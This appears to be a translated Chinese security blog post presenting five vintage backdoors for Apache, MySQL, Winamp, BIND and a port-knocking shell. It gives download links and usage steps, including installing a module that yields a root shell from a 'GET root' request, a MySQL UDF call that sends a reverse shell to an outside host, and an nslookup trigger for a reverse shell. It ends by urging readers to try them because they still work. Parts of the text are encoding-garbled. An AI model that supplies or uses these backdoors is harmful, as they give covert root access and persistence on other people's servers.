老式后門之美:五種復(fù)古遠(yuǎn)程控制工具(含下載)
目前,高級(jí)的rootkit技術(shù)可以幫助你在滲透中拿到一個(gè)shell后進(jìn)行持久性控制。此外,還有供應(yīng)商故意提供了一些植入后門,但那就是截然不同的故事了。盡管各式花樣翻新的技術(shù)與代碼層出不窮,可你還記得曾經(jīng)用過的那些后門嗎?
本文介紹了5種遠(yuǎn)程控制工具(Remote Administration Tools)RAT ,又稱“后門”,這完全是根據(jù)作者個(gè)人喜好挑選的。這是我進(jìn)行合法滲透測試時(shí)所使用的工具,它們對(duì)于驗(yàn)證滲透的持久性與測量防御手段的有效性提供了重要的幫助。
1.mod_rootme——Apache模塊后門(2004)
“mod_rootme是一個(gè)非??岬哪K,它可以在Apache中安裝一個(gè)后門,你只需要進(jìn)行一個(gè)簡單的GET請(qǐng)求,就可以拿到一個(gè)root權(quán)限的shell,并且在系統(tǒng)中沒有任何日志記錄。”
作為***的工具之一,你只需要執(zhí)行一個(gè)簡單的make命令來編譯共享庫,將它復(fù)制到模塊目錄,在httpd.conf中寫入入“LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so”,然后使用‘apachetl stop;apachectl start’重啟httpd后臺(tái)進(jìn)程。之后,通過“GET root”命令你就得到了一個(gè)root權(quán)限的shell。
下載:https://packetstormsecurity.com/files/33652/mod_rootme-0.3.tgz.html
2.raptor_winudf.sql —— MySQL UDF后門(2004-2006)
“這是一個(gè)基于UDF(用戶定義函數(shù))機(jī)制的MySQL后門工具。可以用它來產(chǎn)生一個(gè)反彈shell(netcat UDF監(jiān)聽80端口)或者執(zhí)行一條系統(tǒng)命令(exec UDF)。”
對(duì)于這個(gè)后門,你可以使用一個(gè)簡單的命令‘#mysql –h x.x.x.x < raptor_winudf.sql’將后門作為一個(gè)用戶定義函數(shù)注入到MySQL中。這樣你便可以從MySQL shell執(zhí)行‘mysql > select exec('ipconfig > c:\\out.txt');’命令。
這個(gè)反彈shell實(shí)現(xiàn)了一個(gè)有趣的功能,可以使用命令‘mysql> select netcat('y.y.y.y');’來調(diào)用,之后就會(huì)發(fā)送一個(gè)交互式shell在指定的主機(jī)(y.y.y.y)的80端口上。
下載 (Win32): http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz
下載 (Linux): http://www.0xdeadbeef.info/exploits/raptor_udf2.c
截圖來源:infamoussyn
3. get_wbkdr.dll插件——Winamp播放器后門(2006)
“wbkdr是非常著名的高保真音樂播放器軟件Winamp后門的一個(gè)POC,它利用了插件接口,在24501端口中調(diào)用cmd.exe。”
下載:https://packetstormsecurity.com/files/53268/wbkdr.zip.html
4.BIND反彈shell后門(2005)
BIND是世界上***的DNS服務(wù)器軟件之一。這個(gè)后門使用了BIND未發(fā)布的補(bǔ)丁,是我的一個(gè)來自阿根廷的朋友開發(fā)的?;旧?,需要你以root用戶的身份來打補(bǔ)丁、編譯以及運(yùn)行服務(wù)。一旦運(yùn)行,用‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server’ 發(fā)送一個(gè)DNS請(qǐng)求,將會(huì)在主機(jī)x.x.x.x的給定端口上觸發(fā)一個(gè)反彈shell。
5.Knock-out—— 基于端口敲門(port-knocking)的后門
這是我使用數(shù)據(jù)包嗅探庫libpcap(服務(wù)器)和數(shù)據(jù)包構(gòu)造庫libnet(客戶端)制作的后門。我運(yùn)用了端口敲門技術(shù),它可以是一個(gè)綁定端口的shell也可以是一個(gè)反彈型的shell。服務(wù)器與客戶端使用相同的配置文件來決定使用哪些端口以及發(fā)送每個(gè)網(wǎng)絡(luò)包時(shí)間所需要的時(shí)間差。Knock-out支持TCP和UDP,并且最近在Linux主機(jī)中仍然可以工作(測試系統(tǒng)Ubuntu Server 14.04)。
下載:https://packetstormsecurity.com/files/52834/knock-out.tar.gz.html
作者寄語
這些后門至今仍然有效,或許你可以嘗試一下。同時(shí),我鼓勵(lì)大家與我們分享你見過的有趣的后門、你喜歡的后門、你用過的最特別的后門以及你所鐘愛的后門。別忘了在Twitter上使用#oldschoolbackdoors(老式后門)標(biāo)簽!